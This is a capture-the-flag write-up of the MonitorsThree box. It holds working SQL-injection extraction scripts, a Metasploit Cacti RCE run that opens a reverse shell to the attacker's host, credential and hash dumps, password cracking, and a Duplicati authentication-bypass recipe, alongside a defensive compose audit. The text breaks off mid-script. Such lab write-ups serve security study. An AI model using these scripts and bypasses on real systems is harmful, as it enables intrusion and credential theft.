MonitorsThree
Recon
└─$ grep moni /etc/hosts
10.129.48.221 monitorsthree.htb cacti.monitorsthree.htb
HTTP (80)
Enumeration

Nothing on the main page, it looks like a placeholder. Enumerate subdomains (the `-fl 338` filter drops the default vhost response by its line count):
└─$ domain="monitorsthree.htb"; ffuf -u "http://$domain" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fl 338
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsthree.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.monitorsthree.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response lines: 338
________________________________________________
cacti [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 83ms]
:: Progress: [4989/4989] :: Job [1/1] :: 287 req/sec :: Duration: [0:00:18] :: Errors: 0 ::
Feroxbuster found /admin on the main domain, but nothing further. Deeper inspection of the /admin route:
└─$ feroxbuster -u http://monitorsthree.htb/admin -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .php,.bak,.txt,.zip
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://monitorsthree.htb/admin
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/common.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php, bak, txt, zip]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 7l 12w 162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 7l 12w 178c http://monitorsthree.htb/admin => http://monitorsthree.htb/admin/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets => http://monitorsthree.htb/admin/assets/
302 GET 0l 0w 0c http://monitorsthree.htb/admin/changelog.php => http://monitorsthree.htb/login.php
302 GET 0l 0w 0c http://monitorsthree.htb/admin/customers.php => http://monitorsthree.htb/login.php
302 GET 0l 0w 0c http://monitorsthree.htb/admin/dashboard.php => http://monitorsthree.htb/login.php
200 GET 0l 0w 0c http://monitorsthree.htb/admin/db.php
200 GET 20l 36w 303c http://monitorsthree.htb/admin/footer.php
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/css => http://monitorsthree.htb/admin/assets/css/
302 GET 0l 0w 0c http://monitorsthree.htb/admin/invoices.php => http://monitorsthree.htb/login.php
302 GET 0l 0w 0c http://monitorsthree.htb/admin/logout.php => http://monitorsthree.htb/login.php
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/images => http://monitorsthree.htb/admin/assets/images/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js => http://monitorsthree.htb/admin/assets/js/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/images/backgrounds => http://monitorsthree.htb/admin/assets/images/backgrounds/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/css/extras => http://monitorsthree.htb/admin/assets/css/extras/
302 GET 0l 0w 0c http://monitorsthree.htb/admin/tasks.php => http://monitorsthree.htb/login.php
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/charts => http://monitorsthree.htb/admin/assets/js/charts/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/css/icons => http://monitorsthree.htb/admin/assets/css/icons/
302 GET 0l 0w 0c http://monitorsthree.htb/admin/users.php => http://monitorsthree.htb/login.php
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/core => http://monitorsthree.htb/admin/assets/js/core/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/swf => http://monitorsthree.htb/admin/assets/swf/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/images/flags => http://monitorsthree.htb/admin/assets/images/flags/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/maps => http://monitorsthree.htb/admin/assets/js/maps/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/pages => http://monitorsthree.htb/admin/assets/js/pages/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/charts/google => http://monitorsthree.htb/admin/assets/js/charts/google/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins => http://monitorsthree.htb/admin/assets/js/plugins/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/core/libraries => http://monitorsthree.htb/admin/assets/js/core/libraries/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/maps/google => http://monitorsthree.htb/admin/assets/js/maps/google/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins/editors => http://monitorsthree.htb/admin/assets/js/plugins/editors/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins/extensions => http://monitorsthree.htb/admin/assets/js/plugins/extensions/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins/forms => http://monitorsthree.htb/admin/assets/js/plugins/forms/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins/maps => http://monitorsthree.htb/admin/assets/js/plugins/maps/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins/media => http://monitorsthree.htb/admin/assets/js/plugins/media/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins/notifications => http://monitorsthree.htb/admin/assets/js/plugins/notifications/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins/pagination => http://monitorsthree.htb/admin/assets/js/plugins/pagination/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/maps/vector => http://monitorsthree.htb/admin/assets/js/maps/vector/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins/trees => http://monitorsthree.htb/admin/assets/js/plugins/trees/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins/ui => http://monitorsthree.htb/admin/assets/js/plugins/ui/
301 GET 7l 12w 178c http://monitorsthree.htb/admin/assets/js/plugins/velocity => http://monitorsthree.htb/admin/assets/js/plugins/velocity/
[####################] - 5m 378240/378240 0s found:40 errors:127
[####################] - 2m 23640/23640 245/s http://monitorsthree.htb/admin/
[####################] - 2m 23640/23640 201/s http://monitorsthree.htb/admin/assets/
[####################] - 3m 23640/23640 153/s http://monitorsthree.htb/admin/assets/css/
[####################] - 3m 23640/23640 133/s http://monitorsthree.htb/admin/assets/images/
[####################] - 3m 23640/23640 128/s http://monitorsthree.htb/admin/assets/js/
[####################] - 3m 23640/23640 129/s http://monitorsthree.htb/admin/assets/images/backgrounds/
[####################] - 3m 23640/23640 130/s http://monitorsthree.htb/admin/assets/css/extras/
[####################] - 3m 23640/23640 133/s http://monitorsthree.htb/admin/assets/js/charts/
[####################] - 3m 23640/23640 132/s http://monitorsthree.htb/admin/assets/css/icons/
[####################] - 3m 23640/23640 134/s http://monitorsthree.htb/admin/assets/js/core/
[####################] - 3m 23640/23640 137/s http://monitorsthree.htb/admin/assets/swf/
[####################] - 3m 23640/23640 137/s http://monitorsthree.htb/admin/assets/images/flags/
[####################] - 2m 23640/23640 161/s http://monitorsthree.htb/admin/assets/js/maps/
[####################] - 2m 23640/23640 172/s http://monitorsthree.htb/admin/assets/js/pages/
[####################] - 2m 23640/23640 177/s http://monitorsthree.htb/admin/assets/js/plugins/
[####################] - 88s 23640/23640 267/s http://monitorsthree.htb/admin/assets/images/ui/
Cacti wasn't going to let us in without credentials: the 2024 CVE with a freshly released PoC (CVE-2024-25641, package import RCE) is post-authentication, so I continued enumerating the base domain.
└─$ ffuf -u 'http://monitorsthree.htb/admin/FUZZ' -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -mc all -fw 6 -e .php,.bak
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsthree.htb/admin/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt
:: Extensions : .php .bak
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response words: 6
________________________________________________
footer.php [Status: 200, Size: 303, Words: 22, Lines: 20, Duration: 78ms]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 77ms]
db.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 82ms]
users.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 81ms]
dashboard.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 79ms]
customers.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 81ms]
navbar.php [Status: 200, Size: 6248, Words: 258, Lines: 144, Duration: 102ms]
changelog.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 81ms]
invoices.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 101ms]
:: Progress: [111150/111150] :: Job [1/1] :: 515 req/sec :: Duration: [0:04:05] :: Errors: 0 ::

SQLi
SQL error on /forgot_password

Brute-force it manually: sqlmap ("slowmap") finds nothing except time-based garbage, but a boolean-based blind injection exists too, since the "Successfully sent password" message only appears when the injected condition is true.
import string
import requests

URL = 'http://monitorsthree.htb/forgot_password.php'
# NB: '_' (and '%') are LIKE wildcards, so with the LIKE payload below '_' matches
# any character; it is harmless for the SUBSTR/= payload that was actually used.
CHARSET = "," + string.ascii_letters + string.digits + "_"
# Boolean oracle: the page only says this when the injected condition is true
SUCCESS = 'Successfully sent password'

# [54] invoices,customers,changelog,tasks,invoice_tasks,users | _
PAYLOAD = "admin' AND (SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='users') LIKE '{}%' -- -"
# [46] id,username,email,password,name,position,dob,si
PAYLOAD = "admin' AND SUBSTR(password,{},1)='{}' -- -"   # the one used for the final run
# [32] 31a181c8372e3afc59dab863430610e8 | _

password = ''
with requests.Session() as session:
    while True:
        for char in CHARSET:
            password_i = len(password)
            # LIKE-prefix variant (for the GROUP_CONCAT payload above):
            # resp = session.post(URL, data={'username': PAYLOAD.format(password + char)})
            resp = session.post(URL, data={'username': PAYLOAD.format(password_i + 1, char)})
            print(f'\r[{password_i}] {password}{char}', end='')
            if SUCCESS in resp.text:
                password += char
                break
        else:
            # no character matched at this position: end of the value
            break
print(f'\r[{password_i}] {password} | {char}')
Note: the first two queries weren't even required, I just messed up my success message 👍😭
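For reference, an added example (not the writeup's script) of the same boolean-based blind extraction done with a binary search on ORD(SUBSTR(...)) instead of walking the charset: 7 requests per byte instead of up to 65. It ships with a simulated oracle and a constructed stand-in secret so it runs offline; `http_oracle()` is the hypothetical drop-in for the real form field:

```python
# Added example: boolean-based blind SQLi extraction with a binary search on
# ORD(SUBSTR(...)). The oracle is a callable payload -> bool; the simulated one
# below stands in for the database so this runs without the target.

# Constructed stand-in for users.password (not the value recovered on the box).
DEMO_SECRET = "deadbeefcafef00d0123456789abcdef"


def build_payload(pos, threshold):
    """Same injection point as the writeup (username field of forgot_password.php):
    the condition is true iff the byte at 1-based `pos` is greater than `threshold`.
    MySQL returns ORD('') == 0 past the end of the string, which ends extraction."""
    return f"admin' AND ORD(SUBSTR(password,{pos},1))>{threshold} -- -"


def simulated_oracle(payload):
    """Evaluates the ORD(SUBSTR(password,pos,1))>n condition against DEMO_SECRET.
    Only understands payloads produced by build_payload()."""
    inner = payload.split("ORD(SUBSTR(password,")[1]
    pos_str, rest = inner.split(",", 1)
    pos = int(pos_str)
    threshold = int(rest.split(">")[1].split(" ")[0])
    if pos > len(DEMO_SECRET):
        return False  # ORD('') is 0, never greater than a non-negative threshold
    return ord(DEMO_SECRET[pos - 1]) > threshold


def http_oracle(url, success_marker="Successfully sent password"):
    """Oracle against the real endpoint (assumed: POST field 'username', as in the
    writeup). `requests` is imported lazily so the offline demo doesn't need it."""
    import requests
    session = requests.Session()

    def ask(payload):
        resp = session.post(url, data={"username": payload}, timeout=10)
        return success_marker in resp.text
    return ask


def extract(oracle, max_len=64):
    """Recover a string one byte at a time. Each byte costs exactly 7 oracle calls
    (binary search over 0..127). Returns (value, number_of_queries)."""
    value, queries = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127  # invariant: ORD of this byte is in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            queries += 1
            if oracle(build_payload(pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # ran off the end of the value
            break
        value += chr(lo)
    return value, queries


if __name__ == "__main__":
    secret, n = extract(simulated_oracle)
    print(f"recovered {secret!r} in {n} queries")
    # against the box:
    # extract(http_oracle("http://monitorsthree.htb/forgot_password.php"))
```

The ORD comparison sidesteps two things the charset walk has to care about: collation case-folding on `=` and the `_`/`%` wildcards in a LIKE prefix.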

Creds:
admin:greencacti2001
CVE-2024-25641
Metasploit module: https://www.rapid7.com/db/modules/exploit/multi/http/cacti_package_import_rce/
msf6 > use exploit/multi/http/cacti_package_import_rce
msf6 exploit(multi/http/cacti_package_import_rce) > set PASSWORD greencacti2001
msf6 exploit(multi/http/cacti_package_import_rce) > set RHOST 10.129.112.75
msf6 exploit(multi/http/cacti_package_import_rce) > set VHOST cacti.monitorsthree.htb
msf6 exploit(multi/http/cacti_package_import_rce) > set LHOST tun0
msf6 exploit(multi/http/cacti_package_import_rce) > exploit
[*] Started reverse TCP handler on 10.10.14.22:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Cacti version
[+] The web server is running Cacti version 1.2.26
[*] Attempting login with user `admin` and password `greencacti2001`
[+] Logged in
[*] Checking permissions to access `package_import.php`
[+] The target appears to be vulnerable.
[*] Uploading the package
[*] Triggering the payload
[*] Sending stage (39927 bytes) to 10.129.112.75
[+] Deleted /var/www/html/cacti/resource/ws4R1.php
[*] Meterpreter session 1 opened (10.10.14.22:4444 -> 10.129.112.75:57624) at 2024-08-24 16:09:43 -0400
meterpreter > shell
Process 76498 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
script /dev/null -qc /bin/bash # Get tty shell
www-data@monitorsthree:~/html/cacti/resource$
www-data@monitorsthree:~/html/app/admin$ cat db.php
<?php
$dsn = 'mysql:host=127.0.0.1;port=3306;dbname=monitorsthree_db';
$username = 'app_user';
$password = 'php_app_password';
$options = [
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
];
try {
$pdo = new PDO($dsn, $username, $password, $options);
} catch (PDOException $e) {
echo 'Connection failed: ' . $e->getMessage();
}
www-data
Admin database dump
www-data@monitorsthree:~/html/app/admin$ mysql -u app_user -p'php_app_password' -e 'SHOW DATABASES;'
+--------------------+
| Database |
+--------------------+
| information_schema |
| monitorsthree_db |
+--------------------+
www-data@monitorsthree:~/html/app/admin$ mysql -u app_user -p'php_app_password' monitorsthree_db -e 'SELECT * FROM users;'
+----+-----------+-----------------------------+----------------------------------+-------------------+-----------------------+------------+------------+-----------+
| id | username | email | password | name | position | dob | start_date | salary |
+----+-----------+-----------------------------+----------------------------------+-------------------+-----------------------+------------+------------+-----------+
| 2 | admin | admin@monitorsthree.htb | 31a181c8372e3afc59dab863430610e8 | Marcus Higgins | Super User | 1978-04-25 | 2021-01-12 | 320800.00 |
| 5 | mwatson | mwatson@monitorsthree.htb | c585d01f2eb3e6e1073e92023088a3dd | Michael Watson | Website Administrator | 1985-02-15 | 2021-05-10 | 75000.00 |
| 6 | janderson | janderson@monitorsthree.htb | 1e68b6eb86b45f6d92f8f292428f77ac | Jennifer Anderson | Network Engineer | 1990-07-30 | 2021-06-20 | 68000.00 |
| 7 | dthompson | dthompson@monitorsthree.htb | 633b683cc128fe244b00f176c8a950f5 | David Thompson | Database Manager | 1982-11-23 | 2022-09-15 | 83000.00 |
+----+-----------+-----------------------------+----------------------------------+-------------------+-----------------------+------------+------------+-----------+
www-data@monitorsthree:/opt$ mysql -u cactiuser -p'cactiuser' -e 'SHOW DATABASES;'
+--------------------+
| Database |
+--------------------+
| cacti |
| information_schema |
| mysql |
+--------------------+
SSH password authentication is disabled (keys only), and the admin password didn't work with su either.
Cacti database dump
Linpeas found cacti mysql config:
drwxr-xr-x 20 www-data www-data 4096 May 18 21:56 /var/www/html/cacti
-rw-r--r-- 1 www-data www-data 6955 May 18 21:46 /var/www/html/cacti/include/config.php
$database_type = 'mysql';
$database_default = 'cacti';
$database_username = 'cactiuser';
$database_password = 'cactiuser';
$database_port = '3306';
$database_ssl = false;
$database_ssl_key = '';
$database_ssl_cert = '';
$database_ssl_ca = '';
#$rdatabase_type = 'mysql';
#$rdatabase_default = 'cacti';
#$rdatabase_username = 'cactiuser';
#$rdatabase_password = 'cactiuser';
#$rdatabase_port = '3306';
#$rdatabase_ssl = false;
#$rdatabase_ssl_key = '';
#$rdatabase_ssl_cert = '';
#$rdatabase_ssl_ca = '';
www-data@monitorsthree:~/html/app/admin$ mysql -u cactiuser -p'cactiuser' cacti -e 'SHOW TABLES;'
www-data@monitorsthree:/opt$ mysql -u cactiuser -p'cactiuser' cacti -e 'SELECT username,password FROM user_auth;'
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$tjPSsSP6UovL3OTNeam4Oe24TSRuSRRApmqf5vPinSer3mDuyG90G |
| guest | $2y$10$SO8woUvjSFMr1CDo8O3cz.S6uJoqLaTe6/mvIcUuXzKsATo77nLHu |
| marcus | $2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK |
+----------+--------------------------------------------------------------+
Crack password
Crack the marcus hash, as he's the only user worth it:
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=./rockyou.txt hashes
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
12345678910 (?)
1g 0:00:00:04 DONE (2024-08-25 00:28) 0.2389g/s 120.4p/s 120.4c/s 120.4C/s 12345678910..claire
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Privilege Escalation (marcus)
www-data@monitorsthree:/opt$ su - marcus
Password: 12345678910
marcus@monitorsthree:~$ id
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)
User.txt
marcus@monitorsthree:~$ cat user.txt
b1ffe340470dd120b1942573ebe4d69a
Privilege Escalation (root)
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root 1136 Mar 23 2022 /etc/crontab
/etc/cron.d:
total 36
drwxr-xr-x 2 root root 4096 Aug 22 11:34 .
drwxr-xr-x 118 root root 4096 Aug 19 13:09 ..
-rw-r--r-- 1 root root 67 May 18 21:47 cacti
-rw-r--r-- 1 root root 46 May 20 17:30 cleanup_cacti
-rw-r--r-- 1 root root 47 May 21 16:24 cleanup_cron
-rw-r--r-- 1 root root 69 Aug 18 10:18 duplicati
-rw-r--r-- 1 root root 201 Jan 8 2022 e2scrub_all
-rw-r--r-- 1 root root 712 Jan 9 2024 php
-rw-r--r-- 1 root root 102 Mar 23 2022 .placeholder
---
marcus@monitorsthree:/opt/backups/cacti$ cat /etc/cron.d/cacti
*/5 * * * * apache2 php /var/www/html/cacti/poller.php &>/dev/null
marcus@monitorsthree:/opt/backups/cacti$ cat /etc/cron.d/duplicati
*/10 * * * * root cd ~/scripts/duplicati-client && python3 client.py
marcus@monitorsthree:/opt/backups/cacti$ cat /etc/cron.d/cleanup_cacti
* * * * * root /root/scripts/cleanup_cacti.sh
marcus@monitorsthree:/opt/backups/cacti$ cat /etc/cron.d/cleanup_cron
*/5 * * * * root /root/scripts/cleanup_cron.sh
---
...
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
br-c7b83e1b07b0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.18.0.1 netmask 255.255.0.0 broadcast 172.18.255.255
ether 02:42:89:f1:03:e7 txqueuelen 0 (Ethernet)
RX packets 9612 bytes 2589775 (2.5 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 13374 bytes 1548614 (1.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
docker0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:ef:52:dc:f5 txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.112.75 netmask 255.255.0.0 broadcast 10.129.255.255
ether 00:50:56:94:ff:5a txqueuelen 1000 (Ethernet)
RX packets 1064341 bytes 166062421 (166.0 MB)
RX errors 0 dropped 2 overruns 0 frame 0
TX packets 1094341 bytes 640548480 (640.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 573029 bytes 60773918 (60.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 573029 bytes 60773918 (60.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
veth65ddae6: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
ether 26:79:62:d3:7f:56 txqueuelen 0 (Ethernet)
RX packets 9612 bytes 2724343 (2.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 13374 bytes 1548614 (1.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
...
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:8084 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:45751 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8200 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
...
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/ctr
/usr/bin/curl
/usr/bin/docker
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/sbin/runc
/usr/bin/socat
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
ii gcc 4:11.2.0-1ubuntu1 amd64 GNU C compiler
ii gcc-11 11.4.0-1ubuntu1~22.04 amd64 GNU C compiler
ii mono-mcs 6.12.0.200-0xamarin2+ubuntu2004b1 all Mono C# 2.0 / 3.0 / 4.0 / 5.0 compiler for CLI 2.0 / 4.0 / 4.5
ii mono-roslyn 6.12.0.200-0xamarin2+ubuntu2004b1 all Microsoft C# compiler
ii rpcsvc-proto 1.4.2-0ubuntu6 amd64 RPC protocol compiler and definitions
/usr/bin/gcc
Duplicati
Something is running in Docker:
marcus@monitorsthree:~$ cd /opt
marcus@monitorsthree:/opt$ ls -alh
total 24K
drwxr-xr-x 5 root root 4.0K Aug 18 08:00 .
drwxr-xr-x 18 root root 4.0K Aug 19 13:00 ..
drwxr-xr-x 3 root root 4.0K May 20 15:53 backups
drwx--x--x 4 root root 4.0K May 20 14:38 containerd
-rw-r--r-- 1 root root 318 May 26 16:08 docker-compose.yml
drwxr-xr-x 3 root root 4.0K Aug 18 08:00 duplicati
marcus@monitorsthree:/opt$ cat docker-compose.yml
version: "3"
services:
duplicati:
image: lscr.io/linuxserver/duplicati:latest
container_name: duplicati
environment:
- PUID=0
- PGID=0
- TZ=Etc/UTC
volumes:
- /opt/duplicati/config:/config
- /:/source
ports:
- 127.0.0.1:8200:8200
restart: unless-stopped
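That compose file is the whole privilege-escalation primitive: PUID/PGID=0 keeps the linuxserver.io container's processes as root, and `/:/source` hands that root a writable view of the host filesystem. As an added example (not from the writeup or from Duplicati), a small audit that flags exactly those two properties in a compose spec; the spec is embedded as a Python dict constructed from the file above so it runs offline (with PyYAML installed, `yaml.safe_load()` on the real file gives the same structure), and the sensitive-path list is my own choice:

```python
# Added example: audit a docker-compose spec for "root in container + writable
# sensitive host mount", the combination abused later in the writeup.

SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/home", "/var/run/docker.sock", "/proc", "/sys")

# Constructed from /opt/docker-compose.yml shown above.
COMPOSE = {
    "version": "3",
    "services": {
        "duplicati": {
            "image": "lscr.io/linuxserver/duplicati:latest",
            "container_name": "duplicati",
            "environment": ["PUID=0", "PGID=0", "TZ=Etc/UTC"],
            "volumes": ["/opt/duplicati/config:/config", "/:/source"],
            "ports": ["127.0.0.1:8200:8200"],
            "restart": "unless-stopped",
        }
    },
}


def _env_as_dict(env):
    """Compose allows environment as a list of KEY=VAL strings or as a mapping."""
    if isinstance(env, dict):
        return {k: str(v) for k, v in env.items()}
    out = {}
    for item in env or []:
        key, _, val = str(item).partition("=")
        out[key] = val
    return out


def runs_as_root(service):
    """True if processes in the container end up as uid 0 (or privileged)."""
    if service.get("privileged"):
        return True
    user = str(service.get("user", "")).split(":")[0]
    if user in ("0", "root"):
        return True
    # linuxserver.io images drop to PUID/PGID at start-up; 0 keeps them as root.
    env = _env_as_dict(service.get("environment"))
    return env.get("PUID") == "0" or env.get("PGID") == "0"


def sensitive_mounts(service):
    """[(host_path, writable)] for bind mounts of sensitive host locations."""
    found = []
    for vol in service.get("volumes", []):
        if isinstance(vol, str):
            src, writable = vol.split(":")[0], not vol.endswith(":ro")
        else:  # long syntax
            src, writable = str(vol.get("source", "")), not vol.get("read_only", False)
        if not src.startswith("/"):
            continue  # named volume, not a host path
        norm = src.rstrip("/") or "/"
        hit = norm == "/" or any(
            norm == p or norm.startswith(p + "/") for p in SENSITIVE_HOST_PATHS if p != "/"
        )
        if hit:
            found.append((src, writable))
    return found


def audit(compose):
    """Return (service, finding) pairs; root + a writable sensitive mount is a host escape."""
    findings = []
    for name, svc in compose.get("services", {}).items():
        root, mounts = runs_as_root(svc), sensitive_mounts(svc)
        if root:
            findings.append((name, "runs as uid 0 inside the container"))
        for src, writable in mounts:
            findings.append((name, f"bind-mounts host path {src} ({'rw' if writable else 'ro'})"))
        if root and any(w for _, w in mounts):
            findings.append((name, "CRITICAL: root in container + writable host mount = root on host"))
    return findings


if __name__ == "__main__":
    for service, finding in audit(COMPOSE):
        print(f"{service}: {finding}")
```

The fix on the defender's side is the same two knobs in reverse: a non-zero PUID/PGID and a backup source mounted read-only (`/:/source:ro`), which would have left the run-script trick with nowhere on the host to write.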
Inspect the config files (pulled over a throwaway python http.server; note this exposes them to anyone who can reach the box while it runs):
marcus@monitorsthree:/opt/duplicati/config$ python3 -m http.server
---
└─$ curl 10.129.112.75:8000/CTADPNHLTC.sqlite -O
└─$ curl 10.129.112.75:8000/Duplicati-server.sqlite -O
Auth Bypass
Interesting find in Duplicati server database:

Tunnel the port
└─$ ssh marcus@10.129.112.75 -i marcus_id_rsa -L 8200:0:8200
Found an interesting post about Duplicati: "Bypassing Login Authentication With Server-passphrase".
# server-passphrase
Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=
Base64 -> Hex (the console snippet below wants the salted password as a hex string):
59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a

Steps:
Turn intercept on in Burp.
Submit any password on the login form.
Catch the response to the FIRST request (the one that hands back the Nonce and Salt).
In the browser's JavaScript console (the login page already loads CryptoJS), compute the nonced password from the server-passphrase instead of from a real password:
> let data = { // Currently intercepted data
"Status": "OK",
"Nonce": "HLXcNPKiAZhxGKSD4ftNwGFspaifr8geJVOZCmevpbk=",
"Salt": "xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I="
}
> let saltedpwd = "59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a" // server-passphrase
> let noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse(data.Nonce) + saltedpwd)).toString(CryptoJS.enc.Base64);
> noncedpwd
'iIJUVoRS33tg7O9S3+9UoPHMatF+KmtzPsgdMkxMQ7c=' // Forged password
Forward the halted (second) request after replacing its password parameter with
noncedpwd
Pwned!
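To see why knowing server-passphrase is enough, here is the login scheme modelled end to end in Python: an added example, not the writeup's console snippet and not Duplicati's code. The client side mirrors the login script; the server side is reconstructed from it and from the bypass post, so treat the storage format of server-passphrase as an assumption. It runs an honest client, a pass-the-hash client that only has the value pulled from Duplicati-server.sqlite, and a wrong password against a simulated server:

```python
# Added example: Duplicati-style nonce login, honest vs pass-the-hash client.
import base64
import hashlib
import hmac
import os


def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


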